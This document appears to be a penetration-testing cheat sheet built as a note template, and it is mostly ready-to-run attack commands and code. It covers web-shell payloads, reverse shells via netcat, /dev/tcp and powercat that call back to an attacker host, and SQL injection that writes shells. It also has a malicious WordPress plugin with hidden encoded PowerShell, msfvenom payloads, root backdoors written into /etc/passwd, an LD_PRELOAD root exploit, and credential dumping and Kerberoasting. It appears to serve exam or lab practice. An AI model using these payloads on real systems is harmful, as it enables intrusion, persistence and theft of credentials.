Template variables:
LHOST: <% tp.frontmatter["LHOST"] %>
RHOST: <% tp.frontmatter["RHOST"] %>
LPORT: <% tp.frontmatter["LPORT"] %>
RPORT: <% tp.frontmatter["RPORT"] %>
DOMAIN: <% tp.frontmatter["DOMAIN"] %>
USERNAME: <% tp.frontmatter["USERNAME"] %>
PASSWORD: <% tp.frontmatter["PASSWORD"] %>
HASH: <% tp.frontmatter["HASH"] %>
sudo nmap -sS -sV -sC -vv -T4 -Pn <% tp.frontmatter["RHOST"] %>
# FTP Vulnerability Scripts
nmap -p 21 --script ftp-* <% tp.frontmatter["RHOST"] %>
# Recon
nmap -sC -sV <% tp.frontmatter["RHOST"] %>
# Alive hosts
nmap -sn <% tp.frontmatter["RHOST"] %>/24
# scan the 1024 most common ports, run OS detection, run default nmap scripts
nmap -A -oA nmap <% tp.frontmatter["RHOST"] %>
# Scan more deeply, scan all 65535 ports on <% tp.frontmatter["RHOST"] %> with a full connect scan
nmap -v -sT <% tp.frontmatter["RHOST"] %> -p-
# more options
nmap -sV -sC -v -A <% tp.frontmatter["RHOST"] %> -p-
nmap -sT -sV -A -O -v -p 1-65535 <% tp.frontmatter["RHOST"] %>
# scan for vulnerabilities with nmap
nmap --script "vuln" <% tp.frontmatter["RHOST"] %> -p139,445
# my preference
nmap -sV -sC -v -oA output <% tp.frontmatter["RHOST"] %>
nmap -p- -v <% tp.frontmatter["RHOST"] %>
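#!/bin/bash
# Two-pass nmap: a fast full-range sweep to find open ports, followed by a
# service/script scan restricted to exactly those ports.
#
# Usage: ./script.sh <target>
set -eu

# Fail early with a usage line instead of passing an empty target to nmap.
target=${1:?usage: $0 <target>}

# Keep the "NNN/tcp open ..." lines, strip to the port number, join with commas.
# The pattern is quoted so the shell cannot glob-expand '[0-9]'.
ports=$(nmap -p- --min-rate=500 "$target" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# An empty port list would make the second scan run with '-p' and no value.
if [[ -z "$ports" ]]; then
  printf 'no open ports reported for %s\n' "$target" >&2
  exit 1
fi

nmap -p"$ports" -sS -sV -sC -vv -T4 -Pn "$target"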
# you might want to change the port in the command below
# Sweep the last octet 1..254 of the target's /24; brace expansion replaces seq.
for i in {1..254}; do
  nc -zv -w 1 <% tp.frontmatter["RHOST"].split(".").slice(0, -1).join(".") %>.$i <% tp.frontmatter["RPORT"] %>
done
dnsrecon -d <% tp.frontmatter["RHOST"] %> -t axfr
# there is also a metasploit module enum_dns for that
nikto -h <% tp.frontmatter["RHOST"] %>
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls
# Windows Command Execution (RFI exploit)
# Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send
<?php echo shell_exec("nc.exe -nlvp <% tp.frontmatter["RPORT"] %> -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv <% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RPORT"] %>
# paths
http://<% tp.frontmatter["RHOST"] %>/wp-admin
http://<% tp.frontmatter["RHOST"] %>/wp-content/uploads/2017/10/file.png
wpscan --url http://<% tp.frontmatter["RHOST"] %> --log
wpscan --url http://<% tp.frontmatter["RHOST"] %> --enumerate u --log
wpscan --url http://<% tp.frontmatter["RHOST"] %> --wordlist wordlist.txt --username example_username
wpscan --url http://<% tp.frontmatter["RHOST"] %> --api-token WPSCAN_API_TOKEN -e u
An example with a Windows encoded payload.
<?php
/**
* Plugin Name: Kekshell-wp
* Version: 1.0
* Author: Keks
* Author URI: http://venom.com
* License: None
*/
exec("powershell -nop -w hidden -e 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");
?>
TODO: CHECK
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w <wordlist> -x pdf -q
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/wordlists/dirb/big.txt -p pattern
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
ffuf -u http://mentorquotes.htb -w subdomains-top1million-110000.txt -t 256 -H 'Host: FUZZ.mentorquotes.htb'
# removes results by code 302
ffuf -u http://mentorquotes.htb -w subdomains-top1million-110000.txt -t 256 -H 'Host: FUZZ.mentorquotes.htb' -fc 302 -mc all
# removes results by size 26
ffuf -u 'http://vessel.htb/FUZZ' -w directory_2.3_medium_lowercase.txt -t 256 -fs 26
# basic html ntlm auth
hydra -L usernames.txt -p Changeme123 <% tp.frontmatter["RHOST"] %> http-get / -vvv
More info on: https://hashcat.net/wiki/doku.php?id=example_hashes
# NTLMv2-SSP Hash
hashcat -m 5600 hash.txt passwordlist.txt --force
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.revshells.com/
# Reverse
# on kali
nc -lvp <% tp.frontmatter["LPORT"] %>
# on victim
nc <% tp.frontmatter["LHOST"] %> <% tp.frontmatter["LPORT"] %> -e /bin/bash
# nc mkfifo on victim
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <% tp.frontmatter["LHOST"] %> <% tp.frontmatter["LPORT"] %> >/tmp/f
<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
# nc listeners
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/<% tp.frontmatter["LPORT"] %> 0>&1'");?>
<?php passthru("/bin/bash -c 'bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/<% tp.frontmatter["LPORT"] %> 0>&1'");?>
# Usernames: Alphanumeric, minimum of 6 characters, maximum of 12 characters, may consist of upper and lower case letters.
egrep '^[a-zA-Z0-9]{6,12}$' strings
# Emails:
egrep '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b' strings
egrep '^.+@.+\.com$' strings
# URLs:
egrep '^(http|https)://[a-zA-Z0-9./?=_%:-]*$' strings
egrep '^http(s)?.{3}(www)?.+\..+$' strings
# telnet or netcat connection
nc <% tp.frontmatter["RHOST"] %> 25
VRFY root
# Check for commands
nmap -script smtp-commands.nse <% tp.frontmatter["RHOST"] %>
# to find the public share
locate *nfs*.nse
nmap --script nfs-showmount.nse <% tp.frontmatter["RHOST"] %>
# mount the share to a folder under /tmp
mkdir /tmp/nfs
/sbin/mount.nfs <% tp.frontmatter["RHOST"] %>:/home/box /tmp/nfs
#Login
sqsh -S <% tp.frontmatter["RHOST"] %>:<port> -U sa -P password
# commands
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go
# Crawl the links
sqlmap -u http://<% tp.frontmatter["RHOST"] %> --crawl=1
sqlmap -u http://<% tp.frontmatter["RHOST"] %> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
# Search for databases
sqlmap -u http://<% tp.frontmatter["RHOST"] %>/index.php?par= --dbs
# dump tables from database
sqlmap -u http://<% tp.frontmatter["RHOST"] %>/index.php?par= --dbs -D dbname --tables --dump
sqlmap -u http://<% tp.frontmatter["RHOST"] %>/index.php?par= --dbs -D dbname -T tablename --dump
# OS Shell
sqlmap -u http://<% tp.frontmatter["RHOST"] %>/comment.php?id=738 --dbms=mysql --osshell
# windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'
# check for sqli vulnerability
?id=1'
# find the number of columns
?id=1 order by 9 -- -
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
# Get the name and password columns from the users table (0x3a is a ':' that only serves as a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/#.php') ,6,7,8,9 -- -
# create a file and call it to check if really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -
# then go to browser and see if you can execute commands
http://<% tp.frontmatter["RHOST"] %>/shell.php?cmd=id
# Then use Pentest Monkey Reverse Shells to call your shell
# SQL Injection (manual)
photoalbum.php?id=1'
# find the number of columns
photoalbum.php?id=1 order by 8
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name='users'
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns where table_name='users'
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users
# view files
' union select 1,2,3, load_file('/etc/passwd') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/#.php') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/includes/config.inc.php') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/mysqli_connect.php') ,5,6,7,8 -- -
# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -
# with responder running, we can get the ntlm hash
xp_dirtree "\\<% tp.frontmatter["LHOST"] %>\asdf"
# or we can get shell
EXECUTE xp_cmdshell 'whoami';
# for this, following options need to be set:
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
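#!/usr/bin/python3
"""Generate candidate account-name variants from a list of full names.

Each "First Last" entry is expanded into 14 common username forms (first,
first+last, first.last, first+initial, initial+first, ... and the same with
first and last swapped) and appended after a seed list of default account
names. When run as a script, every candidate is printed one per line.
"""

# Full names to expand ("First Last").
names = ["Keely Lyons", "Dax Santiago", "Sierra Frye", "Kyla Stewart", "Kaiara Spencer", "Dave Simpson", "Ben Thompson", "Chris Stewart"]
# Default account names that always come first in the output.
# (Named 'seed_accounts' rather than 'list' so the builtin is not shadowed.)
seed_accounts = ["Administrator", "Guest"]


def name_variants(first, last):
    """Return the 14 username forms for one person, in a fixed order.

    Args:
        first: given name (non-empty string).
        last: family name (non-empty string).

    Returns:
        first, first+last, first.last, first+L, first.L, L+first, L.first,
        last, last+first, last.first, last+F, last.F, F+last, F.last,
        where F and L are the first letters of ``first`` and ``last``.
    """
    fi, li = first[0], last[0]
    return [
        first,
        first + last,
        first + "." + last,
        first + li,
        first + "." + li,
        li + first,
        li + "." + first,
        last,
        last + first,
        last + "." + first,
        last + fi,
        last + "." + fi,
        fi + last,
        fi + "." + last,
    ]


def build_candidates(full_names, seed=None):
    """Expand every full name and prepend the seed accounts.

    Args:
        full_names: iterable of "First Last" strings. Only the first and last
            whitespace-separated tokens are used; a single-token name is
            added as-is instead of raising, and blank entries are skipped.
        seed: account names placed at the front of the result (copied, never
            mutated).

    Returns:
        A new list: the seed accounts followed by the variants of each name.
    """
    candidates = list(seed) if seed else []
    for full_name in full_names:
        parts = full_name.split()
        if not parts:
            continue
        if len(parts) == 1:
            candidates.append(parts[0])
        else:
            candidates.extend(name_variants(parts[0], parts[-1]))
    return candidates


if __name__ == "__main__":
    for candidate in build_candidates(names, seed_accounts):
        print(candidate)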
locate *rpc*.nse
nmap --script rpcinfo.nse <% tp.frontmatter["RHOST"] %> -p 111
# Port 111 - RPC
Rpcbind can help us look for NFS shares, so look out for NFS. Obtain the list of services registered with RPC:
rpcbind -p <% tp.frontmatter["RHOST"] %>
rpcinfo -p <% tp.frontmatter["RHOST"] %>
- Connect with a null-session (only works for older windows servers)
rpcclient -U <% tp.frontmatter["USERNAME"] %> <% tp.frontmatter["RHOST"] %>
rpcclient -U "" <% tp.frontmatter["RHOST"] %>
(press enter if asks for a password)
# in shell
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser john
Also:
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>/tools/sysinternals/accesschk.exe kekchk.exe
PS> iwr -uri http://<% tp.frontmatter["LHOST"] %>/tools/windows-resources/offsecTools/Sharphound.ps1 -Outfile Sharphound.ps1
PS> IEX (New-Object Net.Webclient).downloadstring("<% tp.frontmatter["LHOST"] %>/tools/windows-resources/offsecTools/Sharphound.ps1")
# Local SMB
impacket-smbserver KEKSHARE .
impacket-smbserver KEKSHARE . -smb2support
# On victim
copy 20230530072946_BloodHound.zip \\<% tp.frontmatter["LHOST"] %>\KEKSHARE\20230530072946_BloodHound.zip
Msfvenom
#Linux
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f elf > shell.elf
# PHP
msfvenom -p php/reverse_php LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f raw > shell.php
# ASP
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f asp > shell.asp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f war > shell.war
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f raw > shell.jsp
# Exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f exe -o shell_reverse.exe
use multi/manage/autoroute
set session 1
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j
Port 139 and 445 - SMB/Samba shares
Samba is a service that enables the user to share files with other machines
It works much like a command-line FTP client; you may be able to browse files without even having credentials.
# Check SMB vulnerabilities:
nmap --script=smb-check-vulns.nse <% tp.frontmatter["RHOST"] %> -p445
# basic nmap scripts to enumerate shares and OS discovery
nmap -p 139,445 <% tp.frontmatter["RHOST"] %>/24 --script smb-enum-shares.nse smb-os-discovery.nse
# enumerate SMB shares; -a is the "do everything" option
enum4linux -a <% tp.frontmatter["RHOST"] %>
# learn the machine name and then enumerate with smbclient
nmblookup -A <% tp.frontmatter["RHOST"] %>
smbclient -L <server_name> -I <% tp.frontmatter["RHOST"] %>
smbclient -N -L //<% tp.frontmatter["RHOST"] %>
# list shares
smbclient --list <% tp.frontmatter["RHOST"] %>
smbclient -L <% tp.frontmatter["RHOST"] %>
smbclient -L //<% tp.frontmatter["RHOST"] %> -U <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> --password=<% tp.frontmatter["PASSWORD"] %>
smbclient //<% tp.frontmatter["RHOST"] %>/backup -U <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> --password=<% tp.frontmatter["PASSWORD"] %>
smbclient \\\\<% tp.frontmatter["RHOST"] %>\\'Password Audit' -U <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> --password <% tp.frontmatter["PASSWORD"] %>
# Connect using Username
smbclient -L <% tp.frontmatter["RHOST"] %> -U <% tp.frontmatter["USERNAME"] %> -p 445
# Connect to Shares
smbclient \\\\<% tp.frontmatter["RHOST"] %>\\ShareName
smbclient \\\\<% tp.frontmatter["RHOST"] %>\\ShareName -U <% tp.frontmatter["USERNAME"] %>
# anonymous lookup
smbmap -H <% tp.frontmatter["RHOST"] %>
smbmap -H <% tp.frontmatter["RHOST"] %> -u anonymous
smbmap -H <% tp.frontmatter["RHOST"] %> -u guest
smbmap -H <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -p <% tp.frontmatter["PASSWORD"] %>
# recursive
smbmap -H <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -R
# curl with post data
curl -X POST --data 'Archive=git%3Brm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.119.161%20443%20%3E%2Ftmp%2Ff' http://<% tp.frontmatter["RHOST"] %>/archive
curl -v -X OPTIONS http://<% tp.frontmatter["RHOST"] %>/test/
curl --upload-file FILENAME -v --url http://<% tp.frontmatter["RHOST"] %>/test/ -0 --http1.0
# dns server
cat /etc/resolv.conf
# network interface config
ifconfig -a
# network route
route
# trace route to target
traceroute -n RHOST
# arp cache
arp -a
# established tcp/udp ports/connections
netstat -auntp
ss -twurp
ss -tulpn
# current user info
id
# kernel info
uname -a
# recent logins
lastlog
# logged in users
last
# all users including uid and gid
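# all users including uid and gid
# Read the first ':'-separated field of each line directly; no word-splitting
# of a command substitution, and the name is quoted when passed to id.
while IFS=: read -r user _; do id "$user"; done < /etc/passwd
# list all uid 0 (root) accounts
# Compare the uid field exactly: the former grep "0:0" substring match also
# hit entries such as uid 10 / gid 0 or uid 0 / gid 100.
awk -F: '$3 == 0 { print $1 }' /etc/passwd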
# passwd/shadow
cat /etc/passwd
cat /etc/shadow
# sudoers
sudo -l
cat /etc/sudoers
# read .bash_history
cat /root/.bash_history
# read other users .bash_history
find /home/* -name *.*history* -print 2> /dev/null
# OS
cat /etc/issue
cat /etc/*-release
# list all cron jobs
cat /etc/crontab && ls -als /etc/cron*
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
# list processes
ps auxwww
ps -u root
ps -u $USER
# SUID files
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# GUID
find / -perm -2000 -type f 2>/dev/null
# world writeable
find / -perm -2 -type f 2>/dev/null
# list conf files
ls -al /etc/*.conf
grep pass* /etc/*.conf
# open files
lsof -n
# process binaries, paths and permissions
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'
CRON LOGS:
grep "CRON" /var/log/syslog
export PATH=/sbin/:/usr/bin/:/bin/:/usr/bin/:$PATH
TTY Shell
/bin/bash -i
/usr/bin/script -qc /bin/bash /dev/null
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
# example 1
user: b3r
pw: toor
b3r:$1$QLI1P2ID$Zky7j7Yu5vL8agKreLuEL1:0:0:root:/root:/bin/bash
# example 2
echo root::0:0:root:/root:/bin/bash > /etc/passwd
su
# example 3
# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE
# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
# to switch to a root2
su root2
Password: mrcake
Also check: https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/
// gcc -fPIC -shared -o lpe.so lpe.c -nostartfiles
// call
// sudo LD_PRELOAD=/tmp/lpe.so /opt/cleanup.sh
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
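/*
 * Library initialiser (built with -nostartfiles, so this _init stands in for
 * the one normally provided by crti.o). When the object is loaded via
 * LD_PRELOAD it removes that variable so child processes are not re-injected,
 * switches to gid/uid 0 and starts a shell.
 *
 * setgid/setuid are checked: if the loading process was not privileged the
 * failure is reported on stderr and no shell is started, instead of silently
 * opening one as the unprivileged user. This only works where sudo preserves
 * LD_PRELOAD (env_keep); dropping it from env_keep removes the vector.
 */
void _init(void) {
    unsetenv("LD_PRELOAD");
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setgid/setuid");
        return;
    }
    system("/bin/bash");
}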
snmpwalk -v X -c public <% tp.frontmatter["RHOST"] %> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %>
onesixtyone -c snmp_default_pass.txt <% tp.frontmatter["RHOST"] %>
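# Try every community string in the Metasploit default list; print the
# candidate and the first line of any SNMP response it yields.
# IFS= / -r keep each line intact; the '|| [[ -n ... ]]' still processes a
# final line that lacks a trailing newline.
while IFS= read -r community || [[ -n "$community" ]]; do
  printf '%s\n' "$community"
  snmpbulkwalk -c "$community" -v2c <% tp.frontmatter["RHOST"] %> . 2>/dev/null | head -n 1
done < /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt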
# request processes
snmpbulkwalk -c internal -v2c <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.4.2.1.2
# command lines
snmpbulkwalk -c internal -v2c <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.4.2.1.5
# MD5 Wordpress
# write uname:hash in hashes.txt and then
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# RSA private key
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
A fully working GCC with every compatible library:
STEP BY STEP GUIDE (you must have docker installed on Kali):
THE FOLLOWING LINES ARE ONE TIME ONLY. THESE LINES PULL THE OFFICIAL DEBIAN 10 CONTAINER AND CREATES A FOLDER IN YOUR (KALI) HOME DIRECTORY. THIS WILL BE THE SHARED FOLDER WHICH YOU CAN USE TO SHARE FILES BETWEEN THE CONTAINER AND KALI:
kali@kali:~$ docker pull debian:10
kali@kali:~$ mkdir ~/docker_shared
kali@kali:~$ docker run --name debian10 -v ~/docker_shared:/media -it debian:10 /bin/bash
root@e3edde4cb3e3:/# apt update && apt install gcc-multilib build-essential
FROM THIS POINT YOU CAN STOP/START YOUR CONTAINER FROM KALI WITH
kali@kali:~$ docker stop/start debian10
kali@kali:~$ docker exec -it debian10 /bin/bash
IF YOU WANT TO COMPILE YOUR CODE SIMPLY PUT THE C/C++ FILE INTO YOUR ~/docker_shared FOLDER AND USE gcc FROM THE /media FOLDER IN THE CONTAINER
# EMAIL SEND
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
# running nc as Admin
runas /user:Administrator "C:\Users\anirudh\nc.exe <% tp.frontmatter["LHOST"] %> <% tp.frontmatter["LPORT"] %> -e cmd"
xfreerdp /u:stephanie /d:corp.com /v:<% tp.frontmatter["RHOST"] %> /p:"LegmanTeamBenzoin\!\!" +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
xfreerdp /v:<% tp.frontmatter["RHOST"] %> /u:alex /p:WelcomeToWinter0121 +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
enum4linux <% tp.frontmatter["RHOST"] %> -A
# AlwaysInstallElevated :
msiexec /quiet /qn /i shell.msi
# AutoLogin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
route print
ipconfig /all
arp -a
netstat -ano
whoami
whoami /priv
whoami /groups
net user
# More on
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/access-tokens
# Non-default services
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
# Checking which account service is running on
sc qc SERVICE_NAME
# Checking directory permissions
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
# SMB Auth
net use \\<% tp.frontmatter["RHOST"] %>\share /USER:user s3cureP@ssword
copy \\<% tp.frontmatter["RHOST"] %>\share\Wrapper.exe %TEMP%\wrapper-keks10k.exe
# SMB Disconnect
`net use \\<% tp.frontmatter["RHOST"] %>\share /del`
# More enumeration:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Unquoted Service Paths:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
# filesearch
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.log,*.xml,*.conf,*.config -File -Recurse -ErrorAction SilentlyContinue
# passwordsearch
findstr /si password= *.xml *.ini *.txt *.config *.log *.conf
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Restart-Service EnterpriseService
Cool tools to check out: https://github.com/411Hall/JAWS https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS https://github.com/PowerShellMafia/PowerSploit https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Also: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
# powercat command download and execute oneliner
IEX (New-Object System.Net.Webclient).DownloadString("http://<% tp.frontmatter["LHOST"] %>/powercat.ps1");powercat -c <% tp.frontmatter["LHOST"] %> -p <% tp.frontmatter["LPORT"] %> -e powershell
Adding user:
net user keks wlan08 /add
net localgroup Administrators keks /add
net localgroup "Remote Management Users" keks /add
See also https://gist.github.com/jivoi/1c8fc3988af2e5b6df0d6cb188514962
BEST GROUP PERMISSIONS:
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
.\StandIn_v13_Net45.exe --gpo
.\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --acl
.\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --localadmin anirudh
gpupdate /force
# usually used as MITM to grab hashes of compromised machines
sudo responder -I tap0 -w -r
# OSCP - safe responder usage
sudo responder -A -I tap0
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN | select samaccountname,serviceprincipalname
Get-NetGroup | select cn
Get-NetGroup "Domain Admins" | select member
Get-NetComputer
Get-NetComputer -ComputerName web04 | select operatingsystem,dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName files04
Get-NetSession -ComputerName files04 -Verbose
Get-NetComputer web04 | select dnshostname,operatingsystem,operatingsystemversion
Get-ObjectAcl -Identity stephanie
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName
# impacket-smbclient
impacket-smbclient guest@dc.outdated.htb
use SHARE
# impacket-psexec
impacket-psexec test.local/john:password123@<% tp.frontmatter["RHOST"] %>
# impacket-secretsdump
impacket-secretsdump test.local/john:password123@<% tp.frontmatter["RHOST"] %>
# secretsdump NTDS.DIT and SYSTEM file
# getting the ntds.dit shadow copy
vshadow.exe -nw -p C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
# impacket kerberos , asrep roasting
impacket-GetNPUsers -dc-ip <% tp.frontmatter["RHOST"] %> -request -outputfile hashes.asreproast <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>
impacket-GetNPUsers -dc-ip <% tp.frontmatter["RHOST"] %> -request -outputfile hashes.asreproast -usersfile /root/validusersf.txt "<% tp.frontmatter["DOMAIN"] %>/"
hashcat --help | grep -i "Kerberos"
hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# impacket kerberos , kerberoasting
impacket-GetUserSPNs -request -outputfile hashes.kerberoast -dc-ip <% tp.frontmatter["RHOST"] %> corp.com/jeff
